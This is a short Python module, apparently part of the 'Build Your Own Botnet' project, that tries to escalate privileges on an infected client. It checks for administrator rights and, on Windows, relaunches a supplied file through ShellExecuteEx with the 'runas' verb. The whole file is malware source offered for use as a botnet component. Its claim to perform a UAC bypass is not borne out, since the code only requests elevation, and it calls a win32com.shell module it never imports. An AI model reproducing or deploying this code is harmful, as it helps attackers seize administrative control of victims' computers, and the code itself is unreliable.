1
#!/usr/bin/python
2
# -*- coding: utf-8 -*-
3
'Escalate Privileges (Build Your Own Botnet)'
4

5
# standard library
6
import os
7
import sys
8
import ctypes
9

10
# packages
11
if sys.platform == 'win32':
12
    import win32com.client
13

14
# utilities
15
import util
16

17
# globals
18
packages = ['win32com.client']
19
platforms = ['win32']
20
results = {}
21
usage = 'escalate'
22
description = """
23
Attempt UAC bypass to escalate privileges in the current
24
context on the client host machine
25
"""
26

27
# main
28
def run(filename):
29
    """
30
    Attempt to escalate privileges
31

32
    `Required`
33
    :param str filename:    filename to run as administrator
34

35
    """
36
    try:
37
        if isinstance(filename, str) and os.path.isfile(filename):
38
            if bool(ctypes.windll.shell32.IsUserAnAdmin() if os.name == 'nt' else os.getuid() == 0):
39
                return "Current user has administrator privileges"
40
            else:
41
                if os.name == 'nt':
42
                    return win32com.shell.shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters='{} asadmin'.format(filename))
43
                else:
44
                    return "Privilege escalation not yet available on '{}'".format(sys.platform)
45
        else:
46
            return "Error: argument 'filename' must be a valid filename"
47
    except Exception as e:
48
        return "{} erorr: {}".format(__name__, str(e))
49

50